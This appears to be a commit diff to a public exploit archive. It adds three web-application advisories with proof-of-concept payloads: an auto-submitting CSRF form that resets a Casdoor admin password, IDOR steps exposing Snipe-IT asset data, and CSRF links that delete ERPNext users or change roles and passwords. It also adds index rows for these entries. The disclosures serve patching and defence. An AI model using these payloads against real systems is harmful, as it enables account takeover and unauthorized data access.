DB: 2025-05-07

4 changes to exploits/shellcodes/ghdb

Casdoor 1.901.0 - Cross-Site Request Forgery (CSRF)

Grokability Snipe-IT 8.0.4 - Insecure Direct Object Reference (IDOR)

ERPNext 14.82.1 - Account Takeover via Cross-Site Request Forgery (CSRF)

exploits/go/webapps/52281.html

@@ -0,0 +1,39 @@
+# Exploit Title: Casdoor 1.901.0 - Cross-Site Request Forgery (CSRF)
+# Application: Casdoor
+# Version: 1.901.0
+# Date: 03/07/2024
+# Exploit Author: Van Lam Nguyen
+# Vendor Homepage: https://casdoor.org/
+# Software Link: https://github.com/casdoor/casdoor/archive/refs/tags/v1.901.0.zip
+# Tested on: Windows
+# CVE : N/A
+
+Overview
+==================================================
+Casdoor v1.901.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password.
+This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL.
+
+Proof of Concept
+==================================================
+
+Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step
+
+<html>
+<form action="http://localhost:8000/api/set-password" method="POST">
+    <input name='userOwner' value='built&#45;in' type='hidden'>
+    <input name='userName' value='admin' type='hidden'>
+    <input name='newPassword' value='hacked' type='hidden'>
+    <input type=submit>
+</form>
+<script>
+    history.pushState('', '', '/');
+    document.forms[0].submit();
+</script>
+
+</html>
+
+If a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials
+
+userOwner: built&#45;in
+userName: admin
+newPassword: hacked

exploits/php/webapps/52282.txt

@@ -0,0 +1,37 @@
+# Exploit Title: Grokability Snipe-IT 8.0.4 - Insecure Direct Object Reference (IDOR)
+# Google Dork: N/A
+# Date: 2025-05-02
+# Exploit Author: Sn1p3r-H4ck3r (Siripong Jintung)
+# Vendor Homepage: https://snipeitapp.com
+# Software Link: https://github.com/grokability/snipe-it
+# Version: <= 8.0.4
+# Tested on: Ubuntu 22.04 LTS, Apache2 + MySQL + PHP 8.1
+# CVE: CVE-2025-47226
+
+# Vulnerability Description:
+Snipe-IT <= 8.0.4 contains an Insecure Direct Object Reference (IDOR) vulnerability in the
+`/locations/<id>/printassigned` endpoint. This flaw allows an authenticated user from one
+department to gain access to asset assignment data belonging to other departments by modifying
+the `location_id` in the URL.
+
+# Steps to Reproduce:
+1. Authenticate with a low-privileged account assigned to `location_id = 2`.
+2. Access the print preview page:
+   https://<target>/locations/2/printassigned
+3. Modify the URL to:
+   https://<target>/locations/1/printassigned
+4. The application will disclose inventory/assignment information for location ID 1,
+   even if the user should not have access.
+
+# Impact:
+- Unauthorized access to internal asset and inventory information.
+- Potential for lateral data exposure between departments in the same organization.
+- Disclosure of asset IDs, assignees, and location metadata.
+
+# Mitigation:
+Update to **Snipe-IT v8.1.0** or higher where access control validation has been corrected.
+
+# References:
+- Patch PR: https://github.com/grokability/snipe-it/pull/16672
+- CVE Record: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-47226
+- Release Notes: https://github.com/grokability/snipe-it/releases/tag/v8.1.0

exploits/python/webapps/52283.txt

@@ -0,0 +1,87 @@
+# Exploit Title: ERPNext 14.82.1 - Account Takeover via Cross-Site Request Forgery (CSRF)
+# Google Dork: inurl:"/api/method/frappe"
+# Date: 2025-04-29
+# Exploit Author: Ahmed Thaiban (Thvt0ne)
+# Vendor Homepage: https://erpnext.com
+# Software Link: https://github.com/frappe/erpnext
+# Version: <= 14.82.1, 14.74.3 (Tested)
+# Tested on: Linux (Ubuntu 20.04), Chrome, Firefox.
+# CVE : CVE-2025-28062
+# Category: WebApps
+
+# Description:
+A Cross-Site Request Forgery (CSRF) vulnerability Lead to Account Takeover exists in ERPNext 14.82.1 and 14.74.3. This flaw allows an attacker to perform unauthorized state-changing operations on behalf of a logged-in administrator without their knowledge or consent.
+
+Affected endpoints include:
+- /api/method/frappe.desk.reportview.delete_items
+- /api/method/frappe.desk.form.save.savedocs
+
+Impact:
+- Deletion of arbitrary users
+- Unauthorized role assignment
+- Account takeover via password change
+
+The application fails to enforce CSRF tokens on administrative API requests, violating OWASP recommendations.
+
+---
+
+# PoC 1: Delete a User
+
+<html>
+  <body>
+    <h2>Delete User</h2>
+    <a href="http://target/api/method/frappe.desk.reportview.delete_items?items=%5B%221%401.com%22%5D&doctype=User">
+      Click Here
+    </a>
+  </body>
+</html>
+
+---
+
+# PoC 2: Assign Role
+
+<html>
+  <body>
+    <h2>Assign Role to User</h2>
+    <a href="http://target/api/method/frappe.desk.form.save.savedocs?doc=REDACTED_JSON&action=Save">
+      Add Role
+    </a>
+  </body>
+</html>
+
+---
+
+# PoC 3: Reset Password
+
+<html>
+  <body>
+    <h2>Reset User Password</h2>
+    <a href="http://target/api/method/frappe.desk.form.save.savedocs?doc=REDACTED_JSON&action=Save">
+      Reset Password
+    </a>
+  </body>
+</html>
+
+---
+
+# Mitigation:
+- Enforce CSRF protection for all administrative endpoints
+- Require POST methods for state changes
+- Mark cookies as SameSite=Strict
+- Implement re-authentication for critical user changes
+
+---
+
+# Disclosure Timeline:
+- 2025-02-09: Vulnerability discovered
+- 2025-02-10: Reported to Frappe (no response)
+- 2025-04-29: Public disclosure via CVE + advisory
+
+---
+
+# Author Contact:
+LinkedIn: https://linkedin.com/in/ahmedth
+GitHub: https://github.com/Thvt0ne
+
+# References:
+- https://owasp.org/www-community/attacks/csrf

files_exploits.csv

@@ -2903,6 +2903,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
 51976,exploits/go/remote/51976.txt,"MinIO < 2024-01-31T20-20-33Z - Privilege Escalation",2024-04-12,"Jenson Zhao",remote,go,,2024-04-12,2024-04-12,0,CVE-2024-24747,,,,,
 51257,exploits/go/webapps/51257.py,"Answerdev 1.0.3 - Account Takeover",2023-04-05,"Eduardo Pérez-Malumbres Cervera",webapps,go,,2023-04-05,2023-04-27,1,CVE-2023-0744,,,,,
+52281,exploits/go/webapps/52281.html,"Casdoor 1.901.0 - Cross-Site Request Forgery (CSRF)",2025-05-06,"Van Lam Nguyen",webapps,go,,2025-05-06,2025-05-06,0,CVE-n/a,,,,,
 51961,exploits/go/webapps/51961.txt,"Casdoor < v1.331.0 - '/api/set-password' CSRF",2024-04-02,"Van Lam Nguyen",webapps,go,,2024-04-02,2024-04-02,0,CVE-2023-34927,,,,,
 51869,exploits/go/webapps/51869.txt,"Ladder v0.0.21 - Server-side request forgery (SSRF)",2024-03-10,@_chebuya,webapps,go,,2024-03-10,2024-03-10,0,CVE-2024-27620,,,,,
 51734,exploits/go/webapps/51734.py,"Minio 2022-07-29T19-40-48Z - Path traversal",2023-10-09,"Jenson Zhao",webapps,go,,2023-10-09,2023-10-09,0,CVE-2022-35919,,,,,
@@ -19645,6 +19646,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45795,exploits/php/webapps/45795.txt,"Grocery crud 1.6.1 - 'search_field' SQL Injection",2018-11-06,"Loading Kura Kura",webapps,php,80,2018-11-06,2018-11-07,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comgrocery-crud-1.6.1.zip,
 48792,exploits/php/webapps/48792.txt,"grocy 2.7.1 - Persistent Cross-Site Scripting",2020-09-07,"Mufaddal Masalawala",webapps,php,,2020-09-07,2020-09-07,0,,,,,,
 51760,exploits/php/webapps/51760.txt,"Grocy <=4.0.2 - CSRF",2024-01-31,"Chance Proctor",webapps,php,,2024-01-31,2024-01-31,0,,,,,,
+52282,exploits/php/webapps/52282.txt,"Grokability Snipe-IT 8.0.4 - Insecure Direct Object Reference (IDOR)",2025-05-06,Sn1p3r-H4ck3r,webapps,php,,2025-05-06,2025-05-06,0,CVE-2025-47226,,,,,
 51526,exploits/php/webapps/51526.txt,"Groomify v1.0 - SQL Injection",2023-06-19,"Ahmet Ümit BAYRAM",webapps,php,,2023-06-19,2023-06-19,0,,,,,,
 7954,exploits/php/webapps/7954.txt,"groone glinks 2.1 - Remote File Inclusion",2009-02-03,"k3vin mitnick",webapps,php,,2009-02-02,,1,OSVDB-51821;CVE-2009-0463,,,,,
 7878,exploits/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php?cat' SQL Injection",2009-01-26,nuclear,webapps,php,,2009-01-25,,1,OSVDB-51628;CVE-2009-0299,,,,,
@@ -35170,6 +35172,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",2021-10-08,"Raven Security Associates",webapps,python,,2021-10-08,2021-10-08,0,CVE-2021-42053,,,,,
 51992,exploits/python/webapps/51992.py,"djangorestframework-simplejwt 5.3.1 - Information Disclosure",2024-04-15,"Dhrumil Mistry",webapps,python,,2024-04-15,2024-04-15,0,CVE-2024-22513,,,,,
 52145,exploits/python/webapps/52145.py,"DocsGPT 0.12.0 - Remote Code Execution",2025-04-09,"Shreyas Malhotra",webapps,python,,2025-04-09,2025-04-09,1,CVE-2025-0868,,,,,
+52283,exploits/python/webapps/52283.txt,"ERPNext 14.82.1 - Account Takeover via Cross-Site Request Forgery (CSRF)",2025-05-06,"Ahmed Thaiban",webapps,python,,2025-05-06,2025-05-06,0,CVE-2025-28062,,,,,
 51580,exploits/python/webapps/51580.txt,"Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated)",2023-07-11,"Sander Ferdinand",webapps,python,,2023-07-11,2023-07-11,0,,,,,,
 49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,,
 52076,exploits/python/webapps/52076.py,"Invesalius3 - Remote Code Execution",2024-08-28,"Alessio Romano (sfoffo)_ Riccardo Degli Esposti (partywave)",webapps,python,,2024-08-28,2024-08-28,0,,,,,,